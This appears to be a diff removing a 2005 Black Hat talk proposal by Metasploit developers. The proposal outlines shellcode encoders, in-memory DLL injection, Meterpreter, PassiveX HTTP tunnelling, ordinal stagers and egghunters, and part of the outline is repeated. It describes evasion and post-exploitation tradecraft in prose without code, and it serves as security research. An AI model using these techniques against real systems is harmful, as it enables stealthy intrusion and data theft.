a. System calls used by the library loader are hooked
|
||||
i. NtCreateFile
|
||||
ii. NtMapViewOfSection
|
||||
iii. etc
|
||||
b. Unique image name is used to identify the image to image that
|
||||
is in memory
|
||||
c. System call hooks are removed so that future injectino can
|
||||
occur
|
||||
d. Alternative approaches
|
||||
i. Could do client-side relocations, but would need to handle
|
||||
import processing
|
||||
4. In-memory library injection on Linux/BSD
|
||||
a. No known public implementations
|
||||
b. Requires alternate approach
|
||||
i. Hooking API routines not always possible -- symtab not
|
||||
mapped into memory
|
||||
ii. libc symbol version mismatches lead to linking nightmares
|
||||
c. Client-side relocations seem most feasible
|
||||
i. Remote side maps a region of memory and sends the client
|
||||
the base address
|
||||
ii. Client processes relocations and transmits the relocated
|
||||
image as its mapped segment would appear
|
||||
iii. Requires locating rtld base so that PLT lookups will
|
||||
work
|
||||
B. VNC Injection
|
||||
1. Implements VNC as an injectable DLL
|
||||
a. Uses RealVNC as the code-base
|
||||
b. VNC communication uses the exploit connection
|
||||
c. No physical trace is left of the VNC server
|
||||
d. Can operate regardless of existing VNC installations
|
||||
2. Easy way to illustrate insecurities
|
||||
a. Suits understand mouse movement better than black box command
|
||||
prompts
|
||||
C. Meterpreter
|
||||
1. Generic post-exploitation suite
|
||||
a. Based on library injection
|
||||
b. Uses the established exploit connection
|
||||
i. Especially powerful with findsock payloads; no new connection
|
||||
c. Executes entirely from memory
|
||||
d. No new processes or file access required for the payload to
|
||||
succeed
|
||||
e. Detailed explanation can be found in included resources
|
||||
(include meterpreter paper)
|
||||
2. Extension system provides advanced automation support
|
||||
a. No need to hand write tedious assembly
|
||||
b. Existing native code can be ported to a meterpreter extension
|
||||
3. Architecture
|
||||
a. Design goals
|
||||
i. Very flexible protocol; should adapt to extension requirements
|
||||
ii. Exposure of a channelized communication system to extensions
|
||||
iii. Stealth operation
|
||||
iv. Should be portable to various operating systems
|
||||
v. Client from one platform should work with server on another
|
||||
platform
|
||||
b. Protocol
|
||||
i. Uses TLVs (Type-Length-Value) to support arbitrary data
|
||||
passing.
|
||||
ii. TLVs allow the packet parser to be oblivious to the structure
|
||||
of the value field
|
||||
iii. Type field is broken down into meta types
|
||||
4. Core interface
|
||||
a. Overview
|
||||
i. Minimal interface to support the loading of extensions
|
||||
ii. Implements the basic packet transmission and dispatching
|
||||
facilities
|
||||
iii. Exposes channel allocation and management to extensions
|
||||
b. Advanced features
|
||||
i. Migrating the server instance between processes
|
||||
5. The ``stdapi'' extension
|
||||
a. Overview
|
||||
i. Included in Metasploit 3.0
|
||||
ii. Provides access to some of the common subsystems of the
|
||||
target operating system
|
||||
iii. Allows for easy automation and implementation of robust
|
||||
post-exploitation scripts
|
||||
b. File System
|
||||
i. File and directory interaction
|
||||
ii. Files can be uploaded and downloaded between the
|
||||
attacker and the target
|
||||
c. Network
|
||||
i. Transparent network pivoting
|
||||
ii. Route table enumeration and manipulation
|
||||
iii. Local interface enumeration
|
||||
d. Process
|
||||
i. Process execution, optionally with channelized IO
|
||||
ii. Enumeration of running processes
|
||||
iii. Modification of arbitrary memory
|
||||
iv. Creation and modification of running threads
|
||||
v. Loading and interacting with shared object files
|
||||
e. Registry
|
||||
i. General registry API access
|
||||
ii. Opening, creating, and removing registry keys
|
||||
iii. Setting, querying, and deleting registry values
|
||||
iv. Enumeration of both keys and values
|
||||
f. User interface
|
||||
i. Disabling local user interaction via the keyboard
|
||||
and/or mouse (similar to VNC)
|
||||
ii. Idle timeout checking to see how long it's been
|
||||
since the user did something interactive
|
||||
6. The ``priv'' extension
|
||||
a. Still in development
|
||||
b. Exposes an interface to escalating local privileges
|
||||
through local vulnerabilities
|
||||
c. SAM dumping support similar to pwdump3
|
||||
D. dN
|
||||
1. Simple low-footprint post-exploitation tool
|
||||
2. Useful to scope out execution enviroment, then bootstrap other tools
|
||||
IV. Payload Research
|
||||
A. PassiveX
|
||||
1. Overview
|
||||
a. Post-exploitation payload
|
||||
b. A derivative of On-Disk library injection that uses
|
||||
ActiveX controls
|
||||
c. Supports arbitrary DLL injection in any language that can
|
||||
be compiled as an ActiveX control (C++, VB, etc)
|
||||
d. Detailed analysis can be found in included resources
|
||||
(include passivex paper)
|
||||
2. Payload Implementation
|
||||
a. Disables iexplore Internet zone restrictions on
|
||||
ActiveX controls
|
||||
i. Modifies four registry values that are stored per-user
|
||||
b. Launches a hidden iexplore at a URL with an embedded
|
||||
OCX
|
||||
i. The OCX does not have to be signed
|
||||
ii. No user interaction is required
|
||||
iii. OCX is automatically downloaded, registered, and loaded
|
||||
into the browser's context
|
||||
3. Sample HTTP tunneling ActiveX control
|
||||
a. HTTP GET/POST used to build tunnel to attacker
|
||||
i. Uses the WININET API
|
||||
ii. Outbound traffic from target machine encapsulated in POST
|
||||
request
|
||||
iii. Inbound traffic from attacker encapsulated in GET response
|
||||
iv. Proxy configuration automatically inherited
|
||||
v. Requires HTTP server capable of performing encap/decap on the
|
||||
HTTP packets
|
||||
b. Streaming connection through HTTP tunnel can be created
|
||||
i. socketpair doesn't exist natively on win32 but can be simulated
|
||||
with a local listener
|
||||
ii. Streaming abstraction allows advanced payloads to transparently
|
||||
use the HTTP transport (Meterpreter, VNC)
|
||||
iii. Local listener less covert, but highly beneficial
|
||||
4. Pros
|
||||
a. Bypasses restrictive outbound filters
|
||||
b. Re-uses proxy configuration
|
||||
c. Looks like normal user traffic
|
||||
d. Allows full access to the win32 API like all forms of
|
||||
library injection
|
||||
5. Cons
|
||||
a. Touches the disk
|
||||
b. Requires administrative access
|
||||
i. Internet Explorer prohibits the downloading of
|
||||
ActiveX controls as non-admin
|
||||
B. Windows Ordinal Stagers
|
||||
1. Overview
|
||||
a. Technique from Oded's lightning talk from core04
|
||||
b. Uses static ordinals to locate winsock symbol addresses
|
||||
c. Compatible with all versions of Windows
|
||||
d. 92 byte reverse stager, 93 byte findsock stager
|
||||
e. Detailed explanation can be found in included resources
|
||||
(include spoonm ordinal paper)
|
||||
2. Reverse Ordinal Stager
|
||||
a. Walks InitOrderModuleList searching for ws2_32
|
||||
b. Uses static ordinals to index the export table
|
||||
c. Creates fd with socket
|
||||
d. Chains connect and recv frames
|
||||
e. Returns into buffer read in from file descriptor
|
||||
C. Egghunting
|
||||
1. Overview
|
||||
a. Small stub payload that can search for a larger payload
|
||||
b. Useful for exploits that have limited payload space but can
|
||||
stash more payload elsewhere in memory
|
||||
c. Example exploits include the IE object type vulnerability.
|
||||
d. Goal is to safely search target address space for the larger
|
||||
payload.
|
||||
e. Larger payload is located by searching for an egg that is prepended
|
||||
to it.
|
||||
f. Detailed analysis can be found in included resources
|
||||
(include egghunt paper)
|
||||
2. Two primary methods of egghunting on Windows
|
||||
a. SEH
|
||||
1. 60 bytes in size, searches for an 8 byte egg, compatible with all
|
||||
versions of Windows (including 9x)
|
||||
2. Installs a custom exception handler
|
||||
3. Begins walking the address space
|
||||
i. When a bad address is encounter, the current pointer is
|
||||
incremented by PAGE_SIZE
|
||||
ii. When a mismatch of the egg is encountered, the current pointer
|
||||
is incremented by one
|
||||
4. Each address is compared against the 8-byte egg
|
||||
i. Bad addresses will throw exceptions which will be handled
|
||||
by the custom exception handler
|
||||
5. When the egg is found, jump past the egg into the larger payload
|
||||
b. System call
|
||||
1. Very small stub (32 bytes), searches for an 8 byte egg, only
|
||||
compatible with NT+
|
||||
2. Uses a non-intrusive system call (NtDisplayString) to search validate
|
||||
addresses
|
||||
i. Same page walking logic as SEH is used
|
||||
3. When the egg is found, jump past the egg into the larger payload
|
||||
3. One primary method of egghunting on Linux
|
||||
a. System call
|
||||
1. 30 bytes in size, searches for an 8 byte egg
|
||||
2. System call technique applies to other UNIX variants as well
|
||||
3. Uses the sigaction system call to validate 16 bytes at once
|
||||
4. Pros
|
||||
i. Very small
|
||||
5. Cons
|
||||
i. Corner cases may cause it to be unstable
|
||||
V. The Complete Picture - Metasploit 3.0
|
||||
A. The power of pre-exploitation prepartion
|
||||
1. Abstract NOP generation
|
||||
2. Abstract payload encoding
|
||||
3. Abstract exploit connection handlers
|
||||
i. Bind handler
|
||||
ii. Reverse handler
|
||||
iii. Findsock handler
|
||||
B. The power of exploit generalization
|
||||
1. Standardized exploit creation interface
|
||||
i. Robust target definitions
|
||||
ii. Detailed exploit implementation information
|
||||
iii. Entirely payload independent, no hardcoding paylaods
|
||||
C. The power of post-exploitation automation
|
||||
1. Complicated tasks made simple with scripting
|
||||
i. Want to download a targets entire harddrive?
|
||||
ii. Want to disable local user interaction?
|
||||
iii. Want to upload and play an mp3 on the target?
|
||||
iv. Want to 'be' on the target's network?
|
||||
2. Standard interface means cross platform support
|
||||
VI. Conclusion - where do we go from here?
|
||||
A. Future Post-exploitation research
|
||||
1. Mesh network support
|
||||
2. Expansion of the stdapi described in this document
|
||||
|
||||
included resources:
|
||||
http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf
|
||||
http://www.hick.org/code/skape/papers/meterpreter.pdf
|
||||
http://www.hick.org/code/skape/papers/remote-library-injection.pdf
|
||||
http://www.hick.org/code/skape/papers/passivex.pdf [not released yet]
|
||||
http://www.metasploit.com/users/spoonm/ordinals.txt
|
||||
|
||||
cited material:
|
||||
STRIDE:
|
||||
http://www.ics.forth.gr/carv/acs/ACS/Activities/papers/stride-IFIP-SEC05.pdf
|
||||
|
||||
syscall proxy:
|
||||
http://www.coresecurity.com/files/files/11/SyscallProxying.pdf
|
||||
|
||||
|
|
@ -1,7 +0,0 @@
|
|||
Skape is a lead software developer by day and an independent security researcher
|
||||
by night. He joined forces with the Metasploit project in 2004 where his many
|
||||
contributions have included the Meterpreter, VNC injection, and many other
|
||||
payload advances. Skape has worked on a number of open-source projects and has
|
||||
authored several papers on security related technologies. His current security
|
||||
related intrerests include post-exploitation technologies, payload development
|
||||
and optimization, and exploitation prevention technology.
|
|
@ -1,673 +0,0 @@
|
|||
Date of Submission:
|
||||
|
||||
04/2005
|
||||
|
||||
I would like to present this at:
|
||||
|
||||
USA 2005
|
||||
|
||||
Personal Information
|
||||
|
||||
Primary Speaker Name:
|
||||
|
||||
spoonm
|
||||
|
||||
Primary Speaker Title (if applicable):
|
||||
|
||||
Additional Speaker Name(s), Title(s) and Company(s) (if applicable):
|
||||
|
||||
skape
|
||||
|
||||
Speaking on Behalf of:
|
||||
|
||||
Primary Contact's Email:
|
||||
|
||||
spoonm@gmail.com
|
||||
|
||||
Primary Contact's Telephone:
|
||||
|
||||
Speaker's Email (if different from the primary speaker's email):
|
||||
|
||||
Speaker's Telephone (if different from the primary speaker's telephone):
|
||||
|
||||
Has the speaker spoken at a previous Black Hat event? Yes or No
|
||||
|
||||
Yes
|
||||
|
||||
Does the speaker have any professional speaking experience? Yes or No
|
||||
|
||||
Yes
|
||||
|
||||
If yes, please list the three most recent engagements.
|
||||
|
||||
- cansecwest 2005
|
||||
- defcon 2004
|
||||
- blackhat 2004
|
||||
|
||||
Has or will this presentation be seen in any form? If so, explain how this
|
||||
presentation is different from previous versions, and where/when this material
|
||||
has been seen before.
|
||||
|
||||
No
|
||||
|
||||
Will or has the speaker(s) be presenting at ANY event 30 days prior to this
|
||||
conference? If yes, please specify which event and on what topic(s).
|
||||
|
||||
No
|
||||
|
||||
Presentation Information
|
||||
|
||||
Name of Presentation:
|
||||
|
||||
- Beyond EIP
|
||||
|
||||
Select the track(s) that your talk would be most appropriate for your topic (you
|
||||
must select at least one of the nine):
|
||||
|
||||
- Deep Knowledge
|
||||
- 0 Day Attack
|
||||
|
||||
How much time does your presentation require? 75 minutes, 90 minutes or 20
|
||||
minutes (turbo track) (please specify)
|
||||
|
||||
90 minutes (could do 75 if necessary)
|
||||
|
||||
What are the three most important reasons why this is a quality Black Hat talk?
|
||||
|
||||
Reason 1:
|
||||
|
||||
Although we continue to publicly release much of our work, there is much
|
||||
more involved under the hood than just what's released. Blackhat is the
|
||||
perfect venue to discuss our ideas, research, design, and development in
|
||||
detail. It's really important to be able to discuss the sort of things we've
|
||||
thought very hard about and to present the conclusions that would otherwise
|
||||
be taken for granted.
|
||||
|
||||
Reason 2:
|
||||
|
||||
The technology discussed in this presentation impacts a wide number of
|
||||
security related fields including NIDS, HIPS, Anti-Virus, penetration
|
||||
testing, and the exploit development cycle in general.
|
||||
|
||||
Reason 3:
|
||||
|
||||
Many of the audience members can't be fully engaged in the deep world of
|
||||
security research. This is a chance for them to get a "view from the
|
||||
trenches", and see what's actually happening on the attacker security front.
|
||||
Audience members will get an idea of where technologies currently stand, how
|
||||
they work, and what might be in store for the future.
|
||||
|
||||
Is there a demonstration? Yes or No
|
||||
|
||||
Yes
|
||||
|
||||
Are the speaker(s) releasing a new tool? Yes or No
|
||||
|
||||
Possibly, or will talk about many recent (within a year) releases.
|
||||
|
||||
Are the speaker(s) releasing a new exploit? Yes or No
|
||||
|
||||
No
|
||||
|
||||
Is there audience participation? Yes or No
|
||||
|
||||
No
|
||||
|
||||
What are your equipment needs?
|
||||
|
||||
1 projector.
|
||||
|
||||
Will you require more than 2 lcd projectors? Yes or No - if yes, please specify
|
||||
how many
|
||||
|
||||
No
|
||||
|
||||
Will you require internet access? Yes or No
|
||||
|
||||
No
|
||||
|
||||
Will you require a white board? Yes or No
|
||||
|
||||
No
|
||||
|
||||
Will you require any special equipment? Yes or No - if yes, please specify.
|
||||
|
||||
No
|
||||
|
||||
Detailed Outline:
|
||||
|
||||
Note:
|
||||
|
||||
We've tried to include most of the topics that will be covered in our
|
||||
presentation. However, many of these things will be discussed, but will not be
|
||||
our main concentration. The majority of our presentation will be around topic
|
||||
V. C, our new post-exploitation advances, and how they will be designed and
|
||||
integrated into Metasploit 3. Metasploit 3 won't be finished in time for
|
||||
Blackhat, but more important than the software itself is the work we've done
|
||||
on developing the individual components that it will be built from.
|
||||
|
||||
This outline is pretty indepth, so it's hard to pick out all the nuggets of
|
||||
coolness. We've developed many really useful technologies in the area of
|
||||
payload development. These are things we've created since last year's
|
||||
Blackhat, including many advances in polymorphic shellcode, and
|
||||
high-permutation attacks.
|
||||
|
||||
I. Introduction
|
||||
A. Who are we?
|
||||
1. spoonm
|
||||
2. skape
|
||||
B. Exploit Technology
|
||||
1. Three Phases of Exploitation
|
||||
a. Pre-exploitation
|
||||
b. Exploitation
|
||||
c. Post-exploitation
|
||||
2. Pre-exploitation - Preparing the payload
|
||||
a. NOP generation
|
||||
b. Payload encoders
|
||||
c. Connection handler initialization
|
||||
3. Exploitation - Leveraging the vulnerability
|
||||
a. Stack overflows
|
||||
c. Heap overflows
|
||||
b. SEH overwrites
|
||||
d. Arbitrary pointer overwrites
|
||||
4. Post-Exploitation - Manipulating the target
|
||||
a. Command shell redirection
|
||||
b. Arbitrary command execution
|
||||
c. Pivoting payloads
|
||||
d. Advanced payload interaction
|
||||
B. Where do we stand?
|
||||
1. Pre-exploitation
|
||||
a. Robust and elegant encoders do exist
|
||||
i. SkyLined's alpha-numeric encoder
|
||||
ii. Spoonm's Shikata Ga Nai
|
||||
b. Payload encoders generally taken for granted
|
||||
i. Most encoders are static with a variable key
|
||||
ii. IDS able to signature static decoder stubs
|
||||
c. NOP generation hasn't publically changed much
|
||||
i. PoC exploits generally use predictable nops, if any
|
||||
ii. ADMmutate easily signatured by most NIDS (Snort, Fnord)
|
||||
iii. Not considered very important to many researchers
|
||||
d. NIDS deployments are playing chase the tail
|
||||
i. The mouse always has the advantage; NIDS is reactive
|
||||
ii. Advanced nops and encoders push NIDS to its limits
|
||||
2. Exploitation
|
||||
a. Techniques have become very mature
|
||||
i. Linux/BSD exploitation techniques largely unchanged
|
||||
ii. Win32 heap overflows now more reliable (oded/shok)
|
||||
iii. Win32 SEH overwrites make exploitation easy, even on XPSP2
|
||||
b. Exploitation topics have been beaten to death
|
||||
3. Post-exploitation
|
||||
a. Common payloads are limited
|
||||
i. Command shell interaction has poor automation support
|
||||
ii. Limited to the command set that the interpreter provides
|
||||
iii. Bounded by the utilities installed on the target machine
|
||||
iv. Restrictive environments (chroot) can hinder command execution
|
||||
v. HIPS vendors becoming more adept at detecting basic payloads
|
||||
- LoadLibraryA from the stack, etc (mcafee 8.0i)
|
||||
b. Communication vectors largely unchanged
|
||||
i. Reverse and port-bind payloads still the most common
|
||||
ii. Findsock style payloads still unused by PoC exploits
|
||||
iii. Alternative communication vectors rarely discussed
|
||||
c. Pivoting technology exists
|
||||
i. Core ST described system call proxying in 2002
|
||||
ii. Metasploit's (2.3) meterpreter provides basic network pivoting
|
||||
C. What will we discuss?
|
||||
1. Pre-exploitation Research
|
||||
a. NOP generation
|
||||
i. Opty2
|
||||
b. Encoders
|
||||
i. Additive feedback encoders
|
||||
ii. Shikata Ga Nai
|
||||
2. Post-Exploitation Research
|
||||
a. Library Injection
|
||||
i. Facilitates things like Meterpreter and VNC injection
|
||||
b. VNC Injection
|
||||
i. Introduced at blackhat04 with the Metasploit 2.2 release
|
||||
c. Meterpreter & dN
|
||||
i. The cross-platform post-exploitation suite
|
||||
3. Payload Research
|
||||
a. PassiveX
|
||||
i. Taking advantage of ActiveX controls
|
||||
b. Ordinal Stagers
|
||||
i. Tiny network capable stagers
|
||||
c. Egghunt (maybe?)
|
||||
i. Small payload capable of locating a larger payload
|
||||
ii. Useful for exploits with limited space
|
||||
II. Pre-exploitation
|
||||
A. OptyNop2
|
||||
1. Creation and benefits of multi-byte nopsleds
|
||||
B. Additive feedback encoders
|
||||
C. Shikata Ga Nai
|
||||
1. High permutation shellcode through simple dependency mappings
|
||||
III. Post-exploitation
|
||||
A. Library Injection
|
||||
1. Overview
|
||||
a. Paper published in 04/2004
|
||||
b. Provides advanced code execution
|
||||
c. Code can be written in any language that can compile down
|
||||
to a shared object.
|
||||
d. Allows developer to use all of the APIs exposed to a normal
|
||||
application.
|
||||
e. Detailed explanation can be found in included resources
|
||||
(include lib inject paper)
|
||||
2. Two types of library injection
|
||||
a. On-Disk
|
||||
i. Library is loaded from the target's harddrive or via a
|
||||
file share.
|
||||
ii. Can be detected by AV products due to fs access
|
||||
b. In-Memory
|
||||
i. Library is uploaded to the target and loaded from memory
|
||||
without touching the disk
|
||||
ii. Evades file system filter drivers, such as those
|
||||
provided by AV companies
|
||||
iii. Not touching the disk means no forensic trace
|
||||
iv. VirtualLock prevents swapping to disk, but requires admin
|
||||
3. In-memory library injection on Windows
|
||||
a. System calls used by the library loader are hooked
|
||||
i. NtCreateFile
|
||||
ii. NtMapViewOfSection
|
||||
iii. etc
|
||||
b. Unique image name is used to identify the image to image that
|
||||
is in memory
|
||||
c. System call hooks are removed so that future injectino can
|
||||
occur
|
||||
d. Alternative approaches
|
||||
i. Could do client-side relocations, but would need to handle
|
||||
import processing
|
||||
4. In-memory library injection on Linux/BSD
|
||||
a. No known public implementations
|
||||
b. Requires alternate approach
|
||||
i. Hooking API routines not always possible -- symtab not
|
||||
mapped into memory
|
||||
ii. libc symbol version mismatches lead to linking nightmares
|
||||
c. Client-side relocations seem most feasible
|
||||
i. Remote side maps a region of memory and sends the client
|
||||
the base address
|
||||
ii. Client processes relocations and transmits the relocated
|
||||
image as its mapped segment would appear
|
||||
iii. Requires locating rtld base so that PLT lookups will
|
||||
work
|
||||
B. VNC Injection
|
||||
1. Implements VNC as an injectable DLL
|
||||
a. Uses RealVNC as the code-base
|
||||
b. VNC communication uses the exploit connection
|
||||
c. No physical trace is left of the VNC server
|
||||
d. Can operate regardless of existing VNC installations
|
||||
2. Easy way to illustrate insecurities
|
||||
a. Suits understand mouse movement better than black box command
|
||||
prompts
|
||||
C. Meterpreter
|
||||
1. Generic post-exploitation suite
|
||||
a. Based on library injection
|
||||
b. Uses the established exploit connection
|
||||
i. Especially powerful with findsock payloads; no new connection
|
||||
c. Executes entirely from memory
|
||||
d. No new processes or file access required for the payload to
|
||||
succeed
|
||||
e. Detailed explanation can be found in included resources
|
||||
(include meterpreter paper)
|
||||
2. Extension system provides advanced automation support
|
||||
a. No need to hand write tedious assembly
|
||||
b. Existing native code can be ported to a meterpreter extension
|
||||
3. Architecture
|
||||
a. Design goals
|
||||
i. Very flexible protocol; should adapt to extension requirements
|
||||
ii. Exposure of a channelized communication system to extensions
|
||||
iii. Stealth operation
|
||||
iv. Should be portable to various operating systems
|
||||
v. Client from one platform should work with server on another
|
||||
platform
|
||||
b. Protocol
|
||||
i. Uses TLVs (Type-Length-Value) to support arbitrary data
|
||||
passing.
|
||||
ii. TLVs allow the packet parser to be oblivious to the structure
|
||||
of the value field
|
||||
iii. Type field is broken down into meta types
|
||||
4. Core interface
|
||||
a. Overview
|
||||
i. Minimal interface to support the loading of extensions
|
||||
ii. Implements the basic packet transmission and dispatching
|
||||
facilities
|
||||
iii. Exposes channel allocation and management to extensions
|
||||
b. Advanced features
|
||||
i. Migrating the server instance between processes
|
||||
5. The ``stdapi'' extension
|
||||
a. Overview
|
||||
i. Included in Metasploit 3.0
|
||||
ii. Provides access to some of the common subsystems of the
|
||||
target operating system
|
||||
iii. Allows for easy automation and implementation of robust
|
||||
post-exploitation scripts
|
||||
b. File System
|
||||
i. File and directory interaction
|
||||
ii. Files can be uploaded and downloaded between the
|
||||
attacker and the target
|
||||
c. Network
|
||||
i. Transparent network pivoting
|
||||
ii. Route table enumeration and manipulation
|
||||
iii. Local interface enumeration
|
||||
d. Process
|
||||
i. Process execution, optionally with channelized IO
|
||||
ii. Enumeration of running processes
|
||||
iii. Modification of arbitrary memory
|
||||
iv. Creation and modification of running threads
|
||||
v. Loading and interacting with shared object files
|
||||
e. Registry
|
||||
i. General registry API access
|
||||
ii. Opening, creating, and removing registry keys
|
||||
iii. Setting, querying, and deleting registry values
|
||||
iv. Enumeration of both keys and values
|
||||
f. User interface
|
||||
i. Disabling local user interaction via the keyboard
|
||||
and/or mouse (similar to VNC)
|
||||
ii. Idle timeout checking to see how long it's been
|
||||
since the user did something interactive
|
||||
6. The ``priv'' extension
|
||||
a. Still in development
|
||||
b. Exposes an interface to escalating local privileges
|
||||
through local vulnerabilities
|
||||
c. SAM dumping support similar to pwdump3
|
||||
D. dN
|
||||
1. Simple low-footprint post-exploitation tool
|
||||
2. Useful to scope out execution enviroment, then bootstrap other tools
|
||||
IV. Payload Research
|
||||
A. PassiveX
|
||||
1. Overview
|
||||
a. Post-exploitation payload
|
||||
b. A derivative of On-Disk library injection that uses
|
||||
ActiveX controls
|
||||
c. Supports arbitrary DLL injection in any language that can
|
||||
be compiled as an ActiveX control (C++, VB, etc)
|
||||
d. Detailed analysis can be found in included resources
|
||||
(include passivex paper)
|
||||
2. Payload Implementation
|
||||
a. Disables iexplore Internet zone restrictions on
|
||||
ActiveX controls
|
||||
i. Modifies four registry values that are stored per-user
|
||||
b. Launches a hidden iexplore at a URL with an embedded
|
||||
OCX
|
||||
i. The OCX does not have to be signed
|
||||
ii. No user interaction is required
|
||||
iii. OCX is automatically downloaded, registered, and loaded
|
||||
into the browser's context
|
||||
3. Sample HTTP tunneling ActiveX control
|
||||
a. HTTP GET/POST used to build tunnel to attacker
|
||||
i. Uses the WININET API
|
||||
ii. Outbound traffic from target machine encapsulated in POST
|
||||
request
|
||||
iii. Inbound traffic from attacker encapsulated in GET response
|
||||
iv. Proxy configuration automatically inherited
|
||||
v. Requires HTTP server capable of performing encap/decap on the
|
||||
HTTP packets
|
||||
b. Streaming connection through HTTP tunnel can be created
|
||||
i. socketpair doesn't exist natively on win32 but can be simulated
|
||||
with a local listener
|
||||
ii. Streaming abstraction allows advanced payloads to transparently
|
||||
use the HTTP transport (Meterpreter, VNC)
|
||||
iii. Local listener less covert, but highly beneficial
|
||||
4. Pros
|
||||
a. Bypasses restrictive outbound filters
|
||||
b. Re-uses proxy configuration
|
||||
c. Looks like normal user traffic
|
||||
d. Allows full access to the win32 API like all forms of
|
||||
library injection
|
||||
5. Cons
|
||||
a. Touches the disk
|
||||
b. Requires administrative access
|
||||
i. Internet Explorer prohibits the downloading of
|
||||
ActiveX controls as non-admin
|
||||
B. Windows Ordinal Stagers
|
||||
1. Overview
|
||||
a. Technique from Oded's lightning talk from core04
|
||||
b. Uses static ordinals to locate winsock symbol addresses
|
||||
c. Compatible with all versions of Windows
|
||||
d. 92 byte reverse stager, 93 byte findsock stager
|
||||
e. Detailed explanation can be found in included resources
|
||||
(include spoonm ordinal paper)
|
||||
2. Reverse Ordinal Stager
|
||||
a. Walks InitOrderModuleList searching for ws2_32
|
||||
b. Uses static ordinals to index the export table
|
||||
c. Creates fd with socket
|
||||
d. Chains connect and recv frames
|
||||
e. Returns into buffer read in from file descriptor
|
||||
C. Egghunting
|
||||
1. Overview
|
||||
a. Small stub payload that can search for a larger payload
|
||||
b. Useful for exploits that have limited payload space but can
|
||||
stash more payload elsewhere in memory
|
||||
c. Example exploits include the IE object type vulnerability.
|
||||
d. Goal is to safely search target address space for the larger
|
||||
payload.
|
||||
e. Larger payload is located by searching for an egg that is prepended
|
||||
to it.
|
||||
f. Detailed analysis can be found in included resources
|
||||
(include egghunt paper)
|
||||
2. Two primary methods of egghunting on Windows
|
||||
a. SEH
|
||||
1. 60 bytes in size, searches for an 8 byte egg, compatible with all
|
||||
versions of Windows (including 9x)
|
||||
2. Installs a custom exception handler
|
||||
3. Begins walking the address space
|
||||
i. When a bad address is encounter, the current pointer is
|
||||
incremented by PAGE_SIZE
|
||||
ii. When a mismatch of the egg is encountered, the current pointer
|
||||
is incremented by one
|
||||
4. Each address is compared against the 8-byte egg
|
||||
i. Bad addresses will throw exceptions which will be handled
|
||||
by the custom exception handler
|
||||
5. When the egg is found, jump past the egg into the larger payload
|
||||
b. System call
|
||||
1. Very small stub (32 bytes), searches for an 8 byte egg, only
|
||||
compatible with NT+
|
||||
2. Uses a non-intrusive system call (NtDisplayString) to search validate
|
||||
addresses
|
||||
i. Same page walking logic as SEH is used
|
||||
3. When the egg is found, jump past the egg into the larger payload
|
||||
3. One primary method of egghunting on Linux
|
||||
a. System call
|
||||
1. 30 bytes in size, searches for an 8 byte egg
|
||||
2. System call technique applies to other UNIX variants as well
|
||||
3. Uses the sigaction system call to validate 16 bytes at once
|
||||
4. Pros
|
||||
i. Very small
|
||||
5. Cons
|
||||
i. Corner cases may cause it to be unstable
|
||||
V. The Complete Picture - Metasploit 3.0
|
||||
A. The power of pre-exploitation prepartion
|
||||
1. Abstract NOP generation
|
||||
2. Abstract payload encoding
|
||||
3. Abstract exploit connection handlers
|
||||
i. Bind handler
|
||||
ii. Reverse handler
|
||||
iii. Findsock handler
|
||||
B. The power of exploit generalization
|
||||
1. Standardized exploit creation interface
|
||||
i. Robust target definitions
|
||||
ii. Detailed exploit implementation information
|
||||
iii. Entirely payload independent, no hardcoding paylaods
|
||||
C. The power of post-exploitation automation
|
||||
1. Complicated tasks made simple with scripting
|
||||
i. Want to download a targets entire harddrive?
|
||||
ii. Want to disable local user interaction?
|
||||
iii. Want to upload and play an mp3 on the target?
|
||||
iv. Want to 'be' on the target's network?
|
||||
2. Standard interface means cross platform support
|
||||
VI. Conclusion - where do we go from here?
|
||||
A. Future Post-exploitation research
|
||||
1. Mesh network support
|
||||
2. Expansion of the stdapi described in this document
|
||||
|
||||
included resources:
|
||||
http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf
|
||||
http://www.hick.org/code/skape/papers/meterpreter.pdf
|
||||
http://www.hick.org/code/skape/papers/remote-library-injection.pdf
|
||||
http://www.hick.org/code/skape/papers/passivex.pdf [not released yet]
|
||||
http://www.metasploit.com/users/spoonm/ordinals.txt
|
||||
|
||||
cited material:
|
||||
STRIDE:
|
||||
http://www.ics.forth.gr/carv/acs/ACS/Activities/papers/stride-IFIP-SEC05.pdf
|
||||
|
||||
syscall proxy:
|
||||
http://www.coresecurity.com/files/files/11/SyscallProxying.pdf
|
||||
|
||||
Abstract:
|
||||
|
||||
When we built Metasploit, our focus was on the exploit development process. We
|
||||
tried to design a system that helped create reliable and robust exploits. While
|
||||
this is obviously very important, it's only the first step in the process. What
|
||||
do you do once you own EIP? Our presentation will concentrate on the recent
|
||||
advancements in shellcode, IDS/firewall evasion, and post-exploitation systems.
|
||||
We will discuss the design and implementation of the technologies that enable
|
||||
complex payloads, such as VNC injection, and the suite of tools we've built upon
|
||||
them. We will then present a glimpse of the next generation of Metasploit, and
|
||||
how these new advances will serve as its backbone.
|
||||
|
||||
Blog Entry:
|
||||
|
||||
Blog entry, Stardate April, 2005
|
||||
|
||||
We have recently been on a new shellcode kick, but this time it's not about
|
||||
making them smaller. We're currently working on building very powerful new
|
||||
post-exploitation shellcode and toolkits, and a very powerful unified API to
|
||||
expose their functionality. This will allow us to diverge from precanned
|
||||
payloads, which will in turn allow users to quickly build powerful and portable
|
||||
post-exploitation tools. We have built strongly upon our Windows DLL
|
||||
injection, and are working on extending similar functionality to the land of
|
||||
Unix. We're also working hard on the next version of Metasploit, which follows
|
||||
this same philosophy of embedability and extensablity, allowing users to build
|
||||
their own tools on top of our framework. Our previous work was all about exploit
|
||||
frameworks. In our new approach we are really building more of a hacker tool
|
||||
framework, allowing very strong automation and customization.
|
||||
|
||||
Supporting File(s):
|
||||
|
||||
Additional files/materials? No
|
||||
|
||||
Speaker's Bio(s):
|
||||
|
||||
Spoonm:
|
||||
|
||||
Since late 2003, spoonm has been one of the core developers behind the
|
||||
Metasploit Project. He is responsible for much of the architecture in version
|
||||
2.0, as well as other components including encoders, nop generators, and a
|
||||
polymorphic shellcode engine. A full-time student at a northern university,
|
||||
spoonm spends too much of his free time on security research projects.
|
||||
|
||||
Skape:
|
||||
|
||||
Skape is a lead software developer by day and an independent security researcher
|
||||
by night. He joined forces with the Metasploit project in 2004 where his many
|
||||
contributions have included the Meterpreter, VNC injection, and many other
|
||||
payload advances. Skape has worked on a number of open-source projects and has
|
||||
authored several papers on security related technologies. His current security
|
||||
related interests include post-exploitation technologies, payload development
|
||||
